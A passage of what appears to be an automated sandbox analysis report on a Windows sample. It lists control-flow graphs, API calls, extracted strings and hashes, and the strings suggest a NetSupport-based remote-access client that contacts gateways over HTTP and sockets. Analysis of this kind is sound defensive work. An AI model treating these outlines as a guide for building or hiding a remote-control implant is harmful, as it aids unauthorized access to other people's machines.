                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                        • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/#v$301389$C:\Users\Public\Netstat\Support\$C:\Users\Public\Netstat\Support\pci.ini$General$HTCTL32$NSM165348$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                        • API String ID: 3301999572-2125502763
                                                                                        • Opcode ID: ef7da8a858402fdeb2c829b4549874ab9ab0861288e5a4992896128f6efbeb83
                                                                                        • Instruction ID: 113ca0ed8ca6c588af7df8218b4b4a9b6038b6632901afc936d3f24ad69a3547
                                                                                        • Opcode Fuzzy Hash: ef7da8a858402fdeb2c829b4549874ab9ab0861288e5a4992896128f6efbeb83
                                                                                        • Instruction Fuzzy Hash: 99D1C5F1D44309AFEB209F258CC8B2B7BB8EB1934CB45442EF54AD7246D7B59840DBA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 979 11029590-1102961e LoadLibraryA 980 11029621-11029626 979->980 981 11029628-1102962b 980->981 982 1102962d-11029630 980->982 983 11029645-1102964a 981->983 984 11029632-11029635 982->984 985 11029637-11029642 982->985 986 11029679-11029685 983->986 987 1102964c-11029651 983->987 984->983 985->983 990 1102972a-1102972d 986->990 991 1102968b-110296a3 call 11162b51 986->991 988 11029653-1102966a GetProcAddress 987->988 989 1102966c-1102966f 987->989 988->989 992 11029671-11029673 SetLastError 988->992 989->986 994 11029748-11029760 InternetOpenA 990->994 995 1102972f-11029746 GetProcAddress 990->995 1001 110296c4-110296d0 991->1001 1002 110296a5-110296be GetProcAddress 991->1002 992->986 999 11029784-11029790 call 11162be5 994->999 995->994 998 11029779-11029781 SetLastError 995->998 998->999 1005 11029796-110297c7 call 11142290 call 11164390 999->1005 1006 11029a0a-11029a14 999->1006 1008 110296d2-110296db GetLastError 1001->1008 1011 110296f1-110296f3 1001->1011 1002->1001 1004 11029762-1102976a SetLastError 1002->1004 1004->1008 1030 110297c9-110297cc 1005->1030 1031 110297cf-110297e4 call 11081a70 * 2 1005->1031 1006->980 1010 11029a1a 1006->1010 1008->1011 1012 110296dd-110296ef call 11162be5 call 11162b51 1008->1012 1015 11029a2c-11029a2f 1010->1015 1016 11029710-1102971c 1011->1016 1017 110296f5-1102970e GetProcAddress 1011->1017 1012->1011 1021 11029a31-11029a36 1015->1021 1022 11029a3b-11029a3e 1015->1022 1016->990 1034 1102971e-11029727 1016->1034 1017->1016 1020 1102976f-11029777 SetLastError 1017->1020 1020->990 1026 11029b9f-11029ba7 1021->1026 1027 11029a40-11029a45 1022->1027 1028 11029a4a 1022->1028 1032 11029bb0-11029bc3 1026->1032 1033 11029ba9-11029baa FreeLibrary 1026->1033 1035 11029b6f-11029b74 1027->1035 1036 11029a4d-11029a55 1028->1036 1030->1031 1054 110297e6-110297ea 1031->1054 1055 110297ed-110297f9 1031->1055 1033->1032 1034->990 1037 11029b76-11029b8d GetProcAddress 1035->1037 1038 11029b8f-11029b95 1035->1038 1040 11029a57-11029a6e GetProcAddress 1036->1040 1041 11029a74-11029a7d 1036->1041 1037->1038 1042 11029b97-11029b99 SetLastError 1037->1042 1038->1026 1040->1041 1044 11029b2e-11029b30 SetLastError 1040->1044 1045 11029a80-11029a82 1041->1045 1042->1026 1047 11029b36-11029b3d 1044->1047 1045->1047 1049 11029a88-11029a8d 1045->1049 1050 11029b4c-11029b6d call 110278a0 * 2 1047->1050 1049->1050 1052 11029a93-11029acf call 1110f4a0 call 11027850 1049->1052 1050->1035 1080 11029ae1-11029ae3 1052->1080 1081 11029ad1-11029ad4 1052->1081 1054->1055 1056 11029824-11029829 1055->1056 1057 110297fb-110297fd 1055->1057 1063 1102982b-1102983c GetProcAddress 1056->1063 1064 1102983e-11029855 InternetConnectA 1056->1064 1060 11029814-1102981a 1057->1060 1061 110297ff-11029812 GetProcAddress 1057->1061 1060->1056 1061->1060 1067 1102981c-1102981e SetLastError 1061->1067 1063->1064 1069 11029881-1102988c SetLastError 1063->1069 1070 110299f7-11029a07 call 111618c1 1064->1070 1071 1102985b-1102985e 1064->1071 1067->1056 1069->1070 1070->1006 1075 11029860-11029862 1071->1075 1076 11029899-110298a1 1071->1076 1082 11029864-11029877 GetProcAddress 1075->1082 1083 11029879-1102987f 1075->1083 1078 110298a3-110298b7 GetProcAddress 1076->1078 1079 110298b9-110298d4 1076->1079 1078->1079 1084 110298d6-110298de SetLastError 1078->1084 1090 110298e1-110298e4 1079->1090 1086 11029ae5 1080->1086 1087 11029aec-11029af1 1080->1087 1081->1080 1085 11029ad6-11029ada 1081->1085 1082->1083 1088 11029891-11029893 SetLastError 1082->1088 1083->1076 1084->1090 1085->1080 1091 11029adc 1085->1091 1086->1087 1092 11029af3-11029b09 call 110d1090 1087->1092 1093 11029b0c-11029b0e 1087->1093 1088->1076 1097 110299f2-110299f5 1090->1097 1098 110298ea-110298ef 1090->1098 1091->1080 1092->1093 1095 11029b10-11029b12 1093->1095 1096 11029b14-11029b25 call 111618c1 1093->1096 1095->1096 1102 11029b3f-11029b49 call 111618c1 1095->1102 1096->1050 1110 11029b27-11029b29 1096->1110 1097->1070 1100 11029a1c-11029a29 call 111618c1 1097->1100 1104 110298f1-11029908 GetProcAddress 1098->1104 1105 1102990a-11029916 1098->1105 1100->1015 1102->1050 1104->1105 1109 11029918-11029920 SetLastError 1104->1109 1114 11029922-1102993b GetLastError 1105->1114 1109->1114 1110->1036 1115 11029956-1102996b 1114->1115 1116 1102993d-11029954 GetProcAddress 1114->1116 1119 11029975-11029983 GetLastError 1115->1119 1116->1115 1117 1102996d-1102996f SetLastError 1116->1117 1117->1119 1120 11029985-1102998a 1119->1120 1121 1102998c-11029998 GetDesktopWindow 1119->1121 1120->1121 1122 110299e2-110299e7 1120->1122 1123 110299b3-110299cf 1121->1123 1124 1102999a-110299b1 GetProcAddress 1121->1124 1122->1097 1126 110299e9-110299ef 1122->1126 1123->1097 1128 110299d1 1123->1128 1124->1123 1125 110299d6-110299e0 SetLastError 1124->1125 1125->1097 1126->1097 1128->1090
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll,461C6054,762323A0,?,00000000), ref: 110295C5
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                        • _malloc.LIBCMT ref: 11029697
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                        • GetLastError.KERNEL32 ref: 110296D2
                                                                                        • _free.LIBCMT ref: 110296DE
                                                                                        • _malloc.LIBCMT ref: 110296E7
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                        • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                        • _free.LIBCMT ref: 11029785
                                                                                          • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                          • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                        • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                        • API String ID: 921868004-913974648
                                                                                        • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                        • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                        • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                        • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                        APIs
                                                                                          • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,0316B898,000000FF,?), ref: 11144ED5
                                                                                          • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0316B898,000000FF,?), ref: 11144EE5
                                                                                        • _fgets.LIBCMT ref: 11061DC2
                                                                                        • _strpbrk.LIBCMT ref: 11061E29
                                                                                        • _fgets.LIBCMT ref: 11061F2C
                                                                                        • _strpbrk.LIBCMT ref: 11061FA3
                                                                                        • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                        • _fgets.LIBCMT ref: 11062035
                                                                                        • _strpbrk.LIBCMT ref: 1106205B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                        • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                        • API String ID: 716802716-1571441106
                                                                                        • Opcode ID: 251bcea0830c1b0ee278ad7eb02bf479ba28029f9b4baf519d3e84d78acdf809
                                                                                        • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                        • Opcode Fuzzy Hash: 251bcea0830c1b0ee278ad7eb02bf479ba28029f9b4baf519d3e84d78acdf809
                                                                                        • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1906 11143570-111435b1 GetModuleFileNameA 1907 111435f3 1906->1907 1908 111435b3-111435c6 call 11081b40 1906->1908 1910 111435f9-111435fd 1907->1910 1908->1907 1917 111435c8-111435f1 LoadLibraryA 1908->1917 1912 111435ff-1114360c LoadLibraryA 1910->1912 1913 11143619-11143637 GetModuleHandleA GetProcAddress 1910->1913 1912->1913 1914 1114360e-11143616 LoadLibraryA 1912->1914 1915 11143647-11143670 GetProcAddress * 4 1913->1915 1916 11143639-11143645 1913->1916 1914->1913 1918 11143673-111436eb GetProcAddress * 10 call 11161d01 1915->1918 1916->1918 1917->1910 1920 111436f0-111436f3 1918->1920
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,762323A0), ref: 111435A3
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                          • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                        • API String ID: 3874234733-2061581830
                                                                                        • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                        • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                        • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                        • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1921 6d1ca980-6d1ca9e7 call 6d1c5840 1924 6d1caa9c 1921->1924 1925 6d1ca9ed-6d1ca9f0 1921->1925 1926 6d1caaa2-6d1caaae 1924->1926 1925->1924 1927 6d1ca9f6-6d1ca9fb 1925->1927 1928 6d1caac6-6d1caacd 1926->1928 1929 6d1caab0-6d1caac5 call 6d1e28e1 1926->1929 1927->1924 1930 6d1caa01-6d1caa06 1927->1930 1933 6d1caacf-6d1caad7 1928->1933 1934 6d1cab48-6d1cab58 socket 1928->1934 1930->1924 1932 6d1caa0c-6d1caa21 EnterCriticalSection 1930->1932 1938 6d1caa89-6d1caa9a LeaveCriticalSection 1932->1938 1939 6d1caa23-6d1caa2b 1932->1939 1933->1934 1940 6d1caad9-6d1caadc 1933->1940 1935 6d1cab5a-6d1cab6f WSAGetLastError call 6d1e28e1 1934->1935 1936 6d1cab70-6d1cabc9 #21 * 2 call 6d1c5e90 1934->1936 1950 6d1cabe8-6d1cac1f bind 1936->1950 1951 6d1cabcb-6d1cabe3 #21 1936->1951 1938->1926 1943 6d1caa30-6d1caa39 1939->1943 1940->1934 1944 6d1caade-6d1cab05 call 6d1ca5c0 1940->1944 1947 6d1caa49-6d1caa51 1943->1947 1948 6d1caa3b-6d1caa3f 1943->1948 1958 6d1cad4a-6d1cad69 EnterCriticalSection 1944->1958 1959 6d1cab0b-6d1cab2f WSAGetLastError call 6d1c30a0 1944->1959 1947->1943 1954 6d1caa53-6d1caa5e LeaveCriticalSection 1947->1954 1948->1947 1952 6d1caa41-6d1caa47 1948->1952 1955 6d1cac41-6d1cac49 1950->1955 1956 6d1cac21-6d1cac40 WSAGetLastError closesocket call 6d1e28e1 1950->1956 1951->1950 1952->1947 1957 6d1caa60-6d1caa88 LeaveCriticalSection call 6d1e28e1 1952->1957 1954->1926 1961 6d1cac59-6d1cac64 1955->1961 1962 6d1cac4b-6d1cac57 1955->1962 1963 6d1cad6f-6d1cad7d 1958->1963 1964 6d1cae50-6d1cae80 LeaveCriticalSection GetTickCount InterlockedExchange 1958->1964 1970 6d1cae82-6d1cae92 call 6d1e28e1 1959->1970 1973 6d1cab35-6d1cab47 call 6d1e28e1 1959->1973 1969 6d1cac65-6d1cac83 htons WSASetBlockingHook call 6d1c7610 1961->1969 1962->1969 1971 6d1cad80-6d1cad86 1963->1971 1964->1970 1979 6d1cac88-6d1cac8d 1969->1979 1976 6d1cad88-6d1cad90 1971->1976 1977 6d1cad97-6d1cae0f InitializeCriticalSection call 6d1c8fb0 call 6d1e0ef0 1971->1977 1976->1971 1981 6d1cad92 1976->1981 1994 6d1cae18-6d1cae4b getsockname 1977->1994 1995 6d1cae11 1977->1995 1984 6d1cac8f-6d1cacc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6d1c30a0 call 6d1e28e1 1979->1984 1985 6d1cacc6-6d1caccd 1979->1985 1981->1964 1988 6d1caccf-6d1cacd6 1985->1988 1989 6d1cad45 WSAUnhookBlockingHook 1985->1989 1988->1989 1993 6d1cacd8-6d1cacfb call 6d1ca5c0 1988->1993 1989->1958 1993->1989 2000 6d1cacfd-6d1cad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6d1c30a0 1993->2000 1994->1964 1995->1994 2000->1970 2003 6d1cad32-6d1cad44 call 6d1e28e1 2000->2003
                                                                                        APIs
                                                                                          • Part of subcall function 6D1C5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6D1C8F91,00000000,00000000,6D20B8DA,?,00000080), ref: 6D1C5852
                                                                                        • EnterCriticalSection.KERNEL32(6D20B898,?,00000000,00000000), ref: 6D1CAA11
                                                                                        • LeaveCriticalSection.KERNEL32(6D20B898), ref: 6D1CAA58
                                                                                        • LeaveCriticalSection.KERNEL32(6D20B898), ref: 6D1CAA68
                                                                                        • LeaveCriticalSection.KERNEL32(6D20B898), ref: 6D1CAA94
                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6D1CAB0B
                                                                                        • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAB4E
                                                                                        • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAB5A
                                                                                        • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAB8E
                                                                                        • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CABB1
                                                                                        • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CABE3
                                                                                        • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC18
                                                                                        • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC21
                                                                                        • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC29
                                                                                        • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC65
                                                                                        • WSASetBlockingHook.WSOCK32(6D1C63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC76
                                                                                        • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC8F
                                                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC96
                                                                                        • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAC9C
                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CACFD
                                                                                        • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAD04
                                                                                        • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAD0A
                                                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAD45
                                                                                        • EnterCriticalSection.KERNEL32(6D20B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1CAD4F
                                                                                        • InitializeCriticalSection.KERNEL32(-6D20CB4A), ref: 6D1CADE6
                                                                                          • Part of subcall function 6D1C8FB0: _memset.LIBCMT ref: 6D1C8FE4
                                                                                          • Part of subcall function 6D1C8FB0: getsockname.WSOCK32(?,?,00000010,?,01712FA8,?), ref: 6D1C9005
                                                                                        • getsockname.WSOCK32(00000000,?,?), ref: 6D1CAE4B
                                                                                        • LeaveCriticalSection.KERNEL32(6D20B898), ref: 6D1CAE60
                                                                                        • GetTickCount.KERNEL32 ref: 6D1CAE6C
                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 6D1CAE7A
                                                                                        Strings
                                                                                        • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6D1CAD14
                                                                                        • *TcpNoDelay, xrefs: 6D1CABB8
                                                                                        • Cannot connect to gateway %s, error %d, xrefs: 6D1CACA6
                                                                                        • Connect error to %s using hijacked socket, error %d, xrefs: 6D1CAB17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
